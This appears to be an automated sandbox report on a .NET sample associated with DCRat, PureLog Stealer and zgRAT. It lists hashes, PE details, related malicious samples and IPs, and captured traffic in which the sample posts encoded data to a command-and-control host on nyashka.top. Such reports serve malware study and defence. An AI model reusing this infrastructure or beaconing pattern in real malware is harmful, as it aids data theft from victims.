Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:57:13	API Interceptor	1879511x Sleep call for process: Z90Z9bYzPa.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.158.202.52	0J5DzstGPi.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	337703cm.n9sh.top/Basecentral.php
	t8F7Ic986c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	797441cm.n9shteam2.top/Videouploads.php
	QH67JSdZWl.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	487997cm.renyash.top/VideoFlowergeneratorTestpublic.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PREVIDER-ASNL	0J5DzstGPi.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.158.202.52
	t8F7Ic986c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.158.202.52
	QH67JSdZWl.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	185.158.202.52
	kWZnXz2Fw7.elf	Get hash	malicious	Mirai	Browse	84.241.133.1
	aQvU3QHA3N.elf	Get hash	malicious	Unknown	Browse	62.165.97.41
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	84.241.184.118
	http://maritimecybersecurity.nl	Get hash	malicious	Unknown	Browse	31.7.2.29
	21y8z80div.elf	Get hash	malicious	Mirai	Browse	80.65.103.15
	botx.arm7.elf	Get hash	malicious	Mirai	Browse	84.241.184.103
	BLBq6xYqWy.elf	Get hash	malicious	Mirai	Browse	80.65.126.250

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\FXwdgBOn.log	0J5DzstGPi.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	aW6kSsgdvv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	HMhdtzxEHf.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	kJrNOFEGbQ.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	lEwK4xROgV.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	onlysteal.exe	Get hash	malicious	DCRat	Browse
	zZ1Y43bxxV.exe	Get hash	malicious	DCRat	Browse
	VqGD18ELBM.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	updIMdPUj8.exe	Get hash	malicious	DCRat	Browse

Process:	C:\Users\user\Desktop\Z90Z9bYzPa.exe
File Type:	ASCII text, with very long lines (424), with no line terminators
Category:	dropped
Size (bytes):	424
Entropy (8bit):	5.860352226081462
Encrypted:	false
SSDEEP:	12:ct316z1Wq7Th2wYapvO1Efe+07ZKMWVjZ7PvM:c3Ez1v6apvbmN9OVjZTM
MD5:	3C3E44979E4C08E866F5C4E985250DEC
SHA1:	4B80FDB0F23808919D6AA342F11A2B2204894E53
SHA-256:	3D582F3DFC20937BE0F557CB475DFC675C59E7BB9B9007E42D3B50C2D6E1AA61
SHA-512:	6E5D4E9C72655CB45D5EAEE083D93384C5B3096DCB64757007940B7B9A0A86147FC2C255D3978C36B01C0ACEFBED49F99F6439F107E45C466D357408C8E54A06
Malicious:	false
Reputation:	low
Preview:	Mwkzy3T8j6JIDkS8s0p3jzvit7PoQvxsjcibDRdx0U1Iel9lcNQThd0WACG1nprxJajkB15aX2DO7nEI7oLCfeLGmLaBLlKLnD8DCYjlSz6pZlZX8839doSpPc8za4Pvs2l4oAGjEkupigrAwDCNrLr8uTyjZuKYkK6hAet71U424nHsv8DX1CDhKnJUMgJUZVEXjJ9RUFVXQzDHMFxbqxhiGZWXVYvVKkciitJl8vDwqqQVjBHGssnmygRKxm55T9NqWeid6Mc5uv1aIAxUQomb60uBc8yVzHcrdk9EcoJgQr1Dp1CwylooXvtfuhB8YGGnSK6hBt1lfGLO8qWl6BgOcxTr1dU5nLHJlOuf4euFtCJQkegDKZBXj2Kf0OqiY68T8Bnu61qbQbeZnDHW6QvNJujtEPoqxMqxEzSi

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.606362154056947
Encrypted:	false
SSDEEP:	12:POJa95pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:WJ6dUOAokItULVDv
MD5:	479265214B7D40F1F133ADCA59674F38
SHA1:	5CE8DE4410682925D3BB0CDBBB4A03405DEAE389
SHA-256:	524C3EB619E3D256AE2A24827D731AE5943268FC14FFE6D619E2E84C3119C941
SHA-512:	44D56680467E77DF23F04F7134ED52898347930E4A6F2D52287C24C8799BC91A93F10BD0FEC9A09D27FD607303FD0397A1F78486DACC92637C0FF167AD7ED34C
Malicious:	false
Preview:	..Pinging 123716 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.554851624962979
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Z90Z9bYzPa.exe
File size:	1'956'352 bytes
MD5:	f022320106ebe6ef239cb75c93f6b3ad
SHA1:	b183fb4f66d5327889a0440eca1a61a69ae9cc00
SHA256:	0b5266ad1c75b3a3d186a050f140ee2d11b076440320989bda85197d3716a3a1
SHA512:	e77d922f9bcc6e9f383d955623c532942f5d6fbc8f41f29d284a165abdb4d6a77ac76cbc1826dabf8bd14fbaa4257258e866c4330d30cf05f17e9b4313dd5f23
SSDEEP:	24576:0bTfyVA9AatfC65K16JPuO+Q3Qvi4m4B2g83KWlumjyICs7reNJCN5a4VznpQiCx:avpAwPDpa9mw2nKWljVeNJCyyVqVa
TLSH:	EB95AE1665A6DE33D27457328957113E9291C7363522FB0B3A1F60D2780BBF18F722AB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=yg................................. ........@.. .......................@............@................................

Entrypoint:	0x5df1ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67793DD0 [Sat Jan 4 13:55:28 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1df180	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1e0000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1e2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1dd1d4	0x1dd200	285e8f32777f1451a2826ef409ab41da	False	0.7837874762575321	data	7.558242031794102	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x1e0000	0x320	0x400	d05b66fd093f5688f9c78aee72f6d256	False	0.349609375	data	2.6430868172484443	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x1e2000	0xc	0x200	a31cc0beec5d922686c17188c421c75d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 11:57:12.669301033 CET	61911	53	192.168.2.4	1.1.1.1
Jan 7, 2025 11:57:13.235071898 CET	53	61911	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:13.399939060 CET	283	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:13.746246099 CET	344	OUT	Data Raw: 00 01 01 01 06 0f 01 00 05 06 02 01 02 02 01 0b 00 05 05 00 02 03 03 0d 01 07 0a 06 06 03 00 50 0d 00 03 01 00 00 06 06 0f 01 02 0b 04 0b 07 03 06 06 0e 5d 0c 0e 04 06 07 00 03 0c 06 0a 00 01 02 57 0e 0e 07 56 04 53 0e 07 0c 55 0f 06 0c 55 04 54 Data Ascii: P]WVSUUT]QRQ\L~N\|v`[}vuRk\|zY`l^\|MRllcosiZ\|}lC`^lNie~V@z}n~Le
Jan 7, 2025 11:57:14.088145018 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:14.173059940 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1340 Connection: keep-alive Data Raw: 56 4a 7d 5e 7b 53 7f 06 79 72 5a 01 6b 62 7f 4b 7d 5e 73 40 68 60 62 54 6d 5a 74 4c 69 5c 70 05 74 63 65 4f 79 71 71 49 75 48 78 00 7e 5b 78 01 55 4b 72 54 60 62 51 01 7f 4c 53 05 7d 74 7e 43 79 66 74 0b 69 60 7f 49 75 5c 5b 07 76 61 5b 4a 7f 5f 7e 00 7d 7f 70 0c 6a 77 56 5a 75 66 7b 06 7c 5b 72 5d 7c 60 5b 02 78 49 6c 04 6f 67 63 5f 78 7e 7b 04 7a 71 64 00 78 05 72 06 6b 60 6c 4a 6f 64 7c 49 7e 71 73 4e 61 5f 56 4a 7a 51 41 5b 7f 49 74 0c 7f 61 58 54 75 6c 7b 5a 6f 52 73 5d 60 5e 6e 0d 7a 5f 7d 02 69 6c 7d 5b 7a 62 7a 01 77 63 70 5a 62 71 5e 03 60 62 7a 50 7e 5d 7a 06 77 71 7d 05 76 65 6b 50 68 6c 65 01 77 7c 78 04 7f 63 6c 07 6f 6c 51 03 6f 60 66 03 6b 6d 6c 08 76 67 6c 05 7e 61 72 09 69 53 5d 4f 6c 53 71 5d 7e 72 6a 5e 7b 5d 46 51 7f 52 52 0c 7f 63 74 0d 7d 5e 7e 4d 7b 54 67 01 7b 4c 60 49 7c 61 5e 58 7c 77 7c 53 7c 60 69 08 6e 5a 60 05 7d 5c 74 01 63 5d 57 51 7b 5c 79 44 77 76 56 00 7d 48 52 03 7d 76 75 42 74 62 63 07 7c 4c 75 4c 7f 49 7e 40 7b 58 6c 42 7d 4d 7f 02 76 62 7d 41 76 71 71 05 7e 61 [TRUNCATED] Data Ascii: VJ}^{SyrZkbK}^s@h`bTmZtLi\ptceOyqqIuHx~[xUKrT`bQLS}t~Cyfti`Iu\[va[J_~}pjwVZuf{\|[r]\|`[xIlogc_x~{zqdxrk`lJod\|I~qsNa_VJzQA[ItaXTul{ZoRs]`^nz_}il}[zbzwcpZbq^`bzP~]zwq}vekPhlew\|xclolQo`fkmlvgl~ariS]OlSq]~rj^{]FQRRct}^~M{Tg{L`I\|a^X\|w\|S\|`inZ`}\tc]WQ{\yDwvV}HR}vuBtbc\|LuLI~@{XlB}Mvb}Avqq~ajI~l^N~Ysvq{xLm~pu{wlL{wxBx}{FzLpxsPL\|`hDxw^J\|bsvOdH}\|gIx\|Oaw\|lx\|pw^bzOWJ\|\|XO{_jvM{u_dtqPNNTwLiLu[ZB\|R}Lw\|RM`{B]{^rD\|CRwYh~r\}S]Bzmnb[}pR\|BpC}`tA~YT{SYJ{LZI\|_Q}Yo\|`}ys`M~L`wsa@{qSufx}H\|O}f_wbsK\|r}}wvxH`A~MgIwbqLvqq\|Ob}\|VC}gguqcGxbi}`yywRyg\|M{}{yrpzsr{]NZxgoYi[cMwaV}U{KghObzQv\|]\xo`It~Nn_\\ioj_z\yvxBagx[L~Jx^TwbSuv`AyMtBs]kc^xgxyYkTwRtpA}\eQzSYQV~[AjcT_PcgBQoAQcSQSNVqdZTq][krQ^NNhcbB}^N\}b{]w`bPzqqae\|jf\|iHvPwr{Dk\rY\|eUoftjZgYwXK_cnFRrKjYLhx_[md\ViY\|]qzYhzY\|L{@Ixr^Xyt}XhcDT{c]RaQaYVk{XTVLvcZsD\|}A]\|\Pxv~^ioAW}e_Y`U[XcXXbLx^\^m[nqwUNRUC\u{s[k`DTp`\TcUQToWXdCaSij\|P~Ey[T[ [TRUNCATED]
Jan 7, 2025 11:57:14.173073053 CET	261	IN	Data Raw: 45 68 71 65 5c 7d 5a 79 6f 63 4b 70 4b 7a 5a 56 5c 5a 05 7a 45 5d 62 5c 40 53 59 0a 5b 52 0b 63 4c 54 7b 78 06 6c 58 74 44 6f 65 71 06 7a 58 6e 46 57 6b 6b 58 6c 70 7b 61 52 7e 74 01 6d 6e 78 56 57 05 6e 51 63 63 08 5f 55 5e 59 59 6a 65 7f 44 71 Data Ascii: Ehqe\}ZyocKpKzZV\ZzE]b\@SY[RcLT{xlXtDoeqzXnFWkkXlp{aR~tmnxVWnQcc_U^YYjeDqXQ\QtAVdUHPYSZTo][Ze}Vf\zR\_\|\DXb`E[rMc[Li}A[XjEZ\oMU}][ol\~^pZz{\|\ocDPqoWXdPRqqRado~b__y^~w{VhoNR\|gVRdRW~Fl]Ub`_zYYQx]GQnoCSqMc\MlbCZe
Jan 7, 2025 11:57:14.205744028 CET	259	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 384 Expect: 100-continue
Jan 7, 2025 11:57:14.415920019 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:14.416313887 CET	384	OUT	Data Raw: 55 59 59 5e 5a 43 59 5a 5a 59 51 55 5a 5a 50 53 55 57 5b 5f 55 57 54 59 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: UYY^ZCYZZYQUZZPSUW[_UWTYYYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%(.<3#]6;0C+'&<65>(U=(S$/77#;.%[/ Q-0
Jan 7, 2025 11:57:14.678610086 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 06 12 25 01 22 0a 23 1a 30 5b 2c 0d 33 38 29 0e 29 32 21 12 3f 33 0b 01 30 01 3c 0d 32 02 2f 12 20 3c 06 42 2a 2f 07 59 23 30 26 50 26 39 28 5c 00 1b 24 5b 27 22 33 1e 2a 0c 31 0a 27 27 08 1b 26 21 30 15 21 13 0c 18 35 5f 3e 0c 22 3e 34 51 39 2e 2b 57 3f 37 23 14 39 19 2f 5d 20 29 20 51 0d 17 38 15 24 10 3b 02 33 3c 3e 5b 23 27 20 56 34 1c 21 1f 25 02 22 5c 26 2e 27 5b 3f 07 1d 06 21 2c 29 14 21 01 28 0c 21 5c 3a 53 2a 2c 23 5d 22 00 20 52 0d 33 58 4f Data Ascii: %"#0[,38))2!?30<2/ <B/Y#0&P&9(\$['"31''&!0!5_>">4Q9.+W?7#9/] ) Q8$;3<>[#' V4!%"\&.'[?!,)!(!\:S*,#]" R3XO
Jan 7, 2025 11:57:14.738513947 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 1856 Expect: 100-continue
Jan 7, 2025 11:57:14.932333946 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:14.932606936 CET	1856	OUT	Data Raw: 55 5e 5c 5d 5f 49 59 5b 5a 59 51 55 5a 5e 50 56 55 52 5b 5b 55 55 54 5e 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: U^\]_IY[ZYQUZ^PVUR[[UUT^YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%Y1&<;63/0%%+5Y3/66> U9/0'#/:4%[/ Q-
Jan 7, 2025 11:57:15.197273016 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 06 12 25 06 22 0a 01 57 30 3d 09 55 24 16 31 0d 2b 0b 31 12 29 23 25 07 30 01 3b 55 25 5a 3f 58 22 3c 3f 1b 2b 2f 39 58 23 23 21 0e 25 13 28 5c 00 1b 24 11 33 0b 37 1e 29 32 26 1e 26 27 22 14 26 22 2c 16 22 3d 3d 08 35 00 22 0a 20 2d 28 19 2e 3e 2f 11 28 1a 2b 5e 2d 09 3b 11 22 39 20 51 0d 17 38 51 26 3e 2f 07 27 05 39 05 35 37 16 51 20 0b 31 5a 26 05 3e 5c 32 3d 02 03 28 07 1a 58 21 3c 04 07 23 28 24 0f 36 14 3e 56 3e 06 23 5d 22 00 20 52 0d 33 58 4f Data Ascii: %"W0=U$1+1)#%0;U%Z?X"<?+/9X##!%(\$37)2&&'"&","==5" -(.>/(+^-;"9 Q8Q&>/'957Q 1Z&>\2=(X!<#($6>V>#]" R3XO

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:14.406008005 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue
Jan 7, 2025 11:57:14.761149883 CET	2536	OUT	Data Raw: 55 59 5c 5c 5a 46 59 52 5a 59 51 55 5a 5d 50 56 55 5f 5b 5a 55 50 54 5c 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: UY\\ZFYRZYQUZ]PVU_[ZUPT\YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&<!+03"0[$%$0%">(3?'##^.%[/ Q-,
Jan 7, 2025 11:57:15.062171936 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:15.230092049 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:15.472419977 CET	260	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue
Jan 7, 2025 11:57:15.823748112 CET	2536	OUT	Data Raw: 50 5e 5c 58 5f 45 5c 55 5a 59 51 55 5a 55 50 51 55 56 5b 5d 55 57 54 5e 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: P^\X_E\UZYQUZUPQUV[]UWT^YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%_<.(3\ 'Y0C4U'%$<"6<><0/<7,\.%[/ Q-
Jan 7, 2025 11:57:16.097291946 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:16.223203897 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:16.222125053 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 1856 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:16.574150085 CET	1856	OUT	Data Raw: 50 58 59 5b 5f 42 59 53 5a 59 51 55 5a 5e 50 5c 55 52 5b 5a 55 55 54 5f 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: PXY[_BYSZYQUZ^P\UR[ZUUT_YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU%^+2&](3"?]$,P3^$<6=3,V%,873.$%[/ Q-
Jan 7, 2025 11:57:16.895900011 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:17.032717943 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 06 12 25 00 22 1d 27 1a 30 3d 30 08 33 28 04 51 2b 22 2e 00 3c 23 0c 13 24 06 30 0d 25 3f 38 00 21 2c 3c 06 3d 3f 0c 07 35 0e 0c 57 26 03 28 5c 00 1b 27 04 24 31 27 10 3e 0c 36 57 26 24 26 14 31 22 0d 01 36 2e 32 1b 35 17 21 1f 23 3d 01 0b 2e 2e 27 1e 28 0a 09 5d 39 09 28 00 20 29 20 51 0d 17 38 56 30 07 23 02 26 2c 03 00 23 37 16 55 23 35 26 01 24 2c 03 02 25 5b 3b 10 28 07 20 12 36 2f 21 58 35 5e 23 54 35 29 2d 0b 3d 3c 23 5d 22 00 20 52 0d 33 58 4f Data Ascii: %"'0=03(Q+".<#$0%?8!,<=?5W&(\'$1'>6W&$&1"6.25!#=..'(]9( ) Q8V0#&,#7U#5&$,%[;( 6/!X5^#T5)-=<#]" R3XO

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:16.364454985 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Jan 7, 2025 11:57:16.714334011 CET	2536	OUT	Data Raw: 55 58 5c 5c 5a 43 59 57 5a 59 51 55 5a 59 50 5c 55 53 5b 5a 55 54 54 5d 59 59 59 51 5e 59 5d 5e 5c 5d 56 45 52 5a 56 5d 5f 51 54 5d 5b 5e 52 5a 56 57 5e 5c 5a 53 51 5f 52 57 50 5e 5b 56 5d 59 58 53 5a 58 5a 58 58 54 5f 58 5f 5e 5e 5c 5e 54 50 5f Data Ascii: UX\\ZCYWZYQUZYP\US[ZUTT]YYYQ^Y]^\]VERZV]_QT][^RZVW^\ZSQ_RWP^[V]YXSZXZXXT_X_^^\^TP_\WVE\[SZYY[XZV^ZBVZ\[XZ]][_UGQ^G[QXXTP[PY\P\B[__[_ZXU^\_XRTWYRX[\]X\[@BYG[X_PUYS_]]^\]S_ZTQX_S]YTP[QXU&+<#\5/X'$%;905Y5=,R>90$?##<-%[/ Q-<
Jan 7, 2025 11:57:17.004218102 CET	25	IN	HTTP/1.1 100 Continue
Jan 7, 2025 11:57:17.131869078 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 07 Jan 2025 10:57:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 34 5a 5f 57 Data Ascii: 4Z_W

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 11:57:17.802684069 CET	284	OUT	POST /LowServerflowerwordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 306577cm.nyashka.top Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
